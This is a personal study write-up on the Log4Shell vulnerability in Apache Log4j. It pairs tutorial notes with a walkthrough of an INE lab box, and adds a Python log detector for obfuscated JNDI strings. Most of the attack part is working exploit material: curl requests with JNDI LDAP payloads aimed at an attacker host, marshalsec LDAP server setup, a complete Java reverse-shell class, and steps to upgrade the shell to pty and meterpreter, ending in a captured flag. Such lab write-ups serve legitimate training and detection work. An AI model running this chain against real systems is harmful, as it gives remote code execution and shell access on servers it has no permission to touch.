# Log4j Vulnerability (Log4Shell)

Background:

1- A quick 3-minute video from Marcus Hutchins on what all the fuss is about:

{% embed url="<https://www.youtube.com/watch?t=77s&v=0-abhd-CLwQ>" %}

2- Reading:

* GOVCERT:

{% embed url="<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j>" %}

* A more practical demonstration from [Sophos](https://www.linkedin.com/company/sophos/):

{% embed url="<https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/amp>" %}

* Interesting findings from the wild with [#interactsh](https://www.linkedin.com/feed/hashtag/?keywords=interactsh), also from [Sophos](https://www.linkedin.com/company/sophos/):

{% embed url="<https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/amp>" %}

Check out the GitHub page; this tool is a must-have in the arsenal:\
<https://github.com/projectdiscovery/interactsh>

## Tut Notes:

#### Check if the server is vulnerable:

1- Start a listener:

```
nc -nlvp 1234
```

2- Send a request with the lookup string in the potentially vulnerable parameter:

```
curl "<url>?cmd=$\{jndi:ldap://<attacker_IP>:1234\}"
```

If nc shows an incoming connection, the target logged the value and performed the JNDI lookup, so it is vulnerable. Two things to keep in mind: the `\{` and `\}` are for curl, which otherwise treats `{...}` as URL globbing and strips the braces (`-g` / `--globoff` is the alternative); and a callback only proves that the lookup fires. Whether the remote class load used in the next section works depends on the target's JVM (newer JDKs ship with `com.sun.jndi.ldap.object.trustURLCodebase=false`), in which case a deserialization gadget already on the target's classpath is the usual way in.

{% embed url="<https://canarytokens.org/generate>" %}
To test a target across the internet, where it cannot connect straight back to your nc, use a CanaryTokens DNS token as the callback host: the lookup string makes the target resolve the token's hostname, and that DNS hit shows up in the token's report.
{% endembed %}

#### Exploiting the vulnerability with your own LDAP server:

* We will be using the following PoC repository to automate the setup:\
  <https://github.com/kozmer/log4j-shell-poc>

1- Set up an LDAP server (marshalsec's `LDAPRefServer`) that answers the JNDI lookup with a reference pointing at the class we host:

```
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<attacker_IP>:8080/#Exploit"
```

> `#Exploit` is the name of the class we will create. marshalsec uses the part before `#` as the codebase URL and the part after it as the class (factory) name in the reference it returns to the target.

* Inside `poc.py` the Java code is present as a comment: copy it to a new `Exploit.java` file, since this is the payload, and fill in `String host="<attacker_IP>";` and `int port=<nc_port>;`.

2- Compile the exploit:

```
javac Exploit.java -source 8 -target 8
```

> `-source`: Java language level
>
> `-target`: class-file (JVM) version; both stay at 8 so the older JVM on the target can load the class
>
> The one warning about the bootstrap class path can be ignored

3- Set up an HTTP server to host the compiled `Exploit.class`:

```
python -m SimpleHTTPServer 8080
```

> 8080 because that is the port in the codebase URL given to the LDAP server in step 1 (not the LDAP port itself). `SimpleHTTPServer` is the Python 2 module; on Python 3 the equivalent is `http.server`.

4- Set up a listener to receive the connection from the target once it is exploited:

```
nc -nlvp 9999
```

> Same port as the one in `Exploit.java`

5- Attack (send the request):

```
curl '<target_url>?cmd=$\{jndi:ldap://<attacker_ip>:<ldap_port>/Exploit\}'
```

> `<ldap_port>`: the port the LDAP server from step 1 listens on (1389 by default)
>
> No file extension is needed: the LDAP server replies with a reference whose codebase is the HTTP URL from step 1, and the target's JNDI client itself fetches `Exploit.class` from there and instantiates it

#### 🎉 Now nc receives a connection, and you have a reverse shell. 🎉

You can spawn a proper bash shell with a pty:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```

And of course you can upgrade to a meterpreter session from msfconsole (catch the shell with `multi/handler` instead of nc):

```
use multi/handler
set LHOST <attacker_ip>
set LPORT <port in java code>
run
background
sessions -u 1
```

> `sessions -u` upgrades the plain shell with the `shell_to_meterpreter` module
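The probes above use the plain `${jndi:...}` form. Defenders grepping logs for that string miss the obfuscated variants that were in use within days of disclosure: the letters are wrapped in Log4j's own lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`), or the whole thing is URL-encoded, and Log4j resolves the nested lookups before it checks the `jndi` prefix, so all of them fire exactly like the plain form. As an added example (not part of this write-up) here is a detector that undoes those layers the way Log4j's substitution does and only then matches; the log lines are constructed, not captured traffic.

```python
"""Detect ${jndi:...} lookups in request logs, including obfuscated forms.

Added example, not the write-up's own code. Log4j resolves nested lookups
innermost-first before checking the prefix, so ${${lower:j}ndi:...} and
${${::-j}ndi:...} reach the JNDI lookup exactly like the plain form. A
substring match for "${jndi:" misses them; this normalizes first. The log
lines at the bottom are constructed, not captured traffic.
"""
import re
import urllib.parse

INNER = re.compile(r"\$\{([^${}]*)\}")                # innermost ${...}, nothing nested inside
JNDI = re.compile(r"\$\{jndi:(\w+):", re.IGNORECASE)  # Log4j lowercases the lookup prefix


def resolve(expr):
    """Evaluate one innermost lookup the way attackers rely on Log4j doing it.
    Real lookups (jndi:, date:, ...) are left in place for the outer match."""
    if ":-" in expr:                        # ${key:-default}: ${::-j}, ${env:NaN:-j}
        return expr.split(":-", 1)[1]
    prefix, sep, value = expr.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return "${" + expr + "}"


def normalize(text, rounds=10):
    """Strip URL-encoding layers, then collapse nested lookups until nothing changes."""
    for _ in range(2):                      # single and double encoding
        text = urllib.parse.unquote(text)
    for _ in range(rounds):
        new = INNER.sub(lambda m: resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return (scheme, normalized_line) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    return (m.group(1).lower(), norm) if m else None


def scan(lines):
    """(index, scheme) for every log line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = detect(line)
        if found:
            hits.append((i, found[0]))
    return hits


LOG_LINES = [  # constructed access-log lines
    '10.0.0.5 - - "GET /login?cmd=${jndi:ldap://10.0.0.9:1389/a} HTTP/1.1" 200',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://10.0.0.9:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://10.0.0.9:1099/a}"',
    '10.0.0.8 - - "GET /?x=%24%7Bjndi%3Aldaps%3A%2F%2F10.0.0.9%2Fa%7D HTTP/1.1" 400',
    '10.0.0.9 - - "GET /?x=${${env:NaN:-j}ndi:${upper:d}ns://10.0.0.9/a} HTTP/1.1" 200',
    '10.0.0.10 - - "GET /docs/jndi-tutorial?q=${date:yyyy} HTTP/1.1" 200',   # benign
]

if __name__ == "__main__":
    for i, scheme in scan(LOG_LINES):
        print("line %d: jndi lookup via %s -> %s" % (i, scheme, detect(LOG_LINES[i])[1]))
```

The normalizer is deliberately narrow: it only evaluates the lookups attackers use to spell out `jndi` (`lower`, `upper` and the `:-` default syntax) and leaves every other lookup untouched, so a benign `${date:...}` in a URL does not trip it and an actual `${jndi:` survives to be matched regardless of scheme (`ldap`, `ldaps`, `rmi`, `dns`).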

## Solving INE Box:

{% embed url="<https://my.ine.com/CyberSecurity/courses/ebd09929/log4j-vulnerability-log4shell>" %}

target: `demo.ine.local`

My IP: `192.10.137.2`

#### Footprinting:

```
~# nmap -sV demo.ine.local

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST
Nmap scan report for demo.ine.local (192.10.137.3)
Host is up (0.0000090s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache Tomcat 8.5.3
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
```

The target runs Apache Tomcat. Tomcat itself does not depend on Log4j by default, but it can be configured to use it, and the application deployed on it can bring its own copy:

{% embed url="<https://lists.apache.org/thread/m3bhytsh3yrhsxvo98vcyx4q6w0m1d4v>" %}

AJP on 8009 is interesting but not the target here; this lab is known to be vulnerable to Log4Shell.

#### Checking for the vulnerability:

```
nc -nlvp 1234
```

```
curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap://192.10.137.2:1234\}'
```

We got a connection in nc, so it is vulnerable... 😀

Time to exploit it:

* My LDAP server:

```
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit"

Listening on 0.0.0.0:1389
```

* nc listener:

```
nc -nlvp 9999
```

* Compiling the Java exploit (reverse shell):

```
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

// Served to the target as Exploit.class. The JNDI client instantiates the
// class it was told to load, so the whole reverse shell lives in the constructor.
public class Exploit {
  public Exploit() throws Exception {

    String host="192.10.137.2";   // attacker IP
    int port=9999;                // port nc listens on
    String cmd="/bin/sh";

    // run the shell with stderr merged into stdout
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();

    // connect back to the listener
    Socket s=new Socket(host,port);

    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();

    // pump shell output to the socket and socket input to the shell
    while(!s.isClosed()) {

      while(pi.available()>0)
        so.write(pi.read());

      while(pe.available()>0)
        so.write(pe.read());

      while(si.available()>0)
        po.write(si.read());

      so.flush();
      po.flush();
      Thread.sleep(50);

      // exitValue() throws while the shell is still running; once it
      // returns, the shell has exited and we tear down
      try {
        p.exitValue();
        break;
      }
      catch (Exception e){}
    }
    p.destroy();
    s.close();
  }
}
```

```
javac Exploit.java -source 8 -target 8
```

* HTTP server hosting the exploit:

```
python -m SimpleHTTPServer 8080
```

* Exploit:

```
curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap://192.10.137.2:1389/Exploit\}'
```

* Goal achieved:

```
root@INE:~# nc -nlvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.10.137.3.
Ncat: Connection from 192.10.137.3:46500.
ls
FLAG
tomcat8
cat FLAG
33fbfa01ec2f791096f13e01988a164e
```


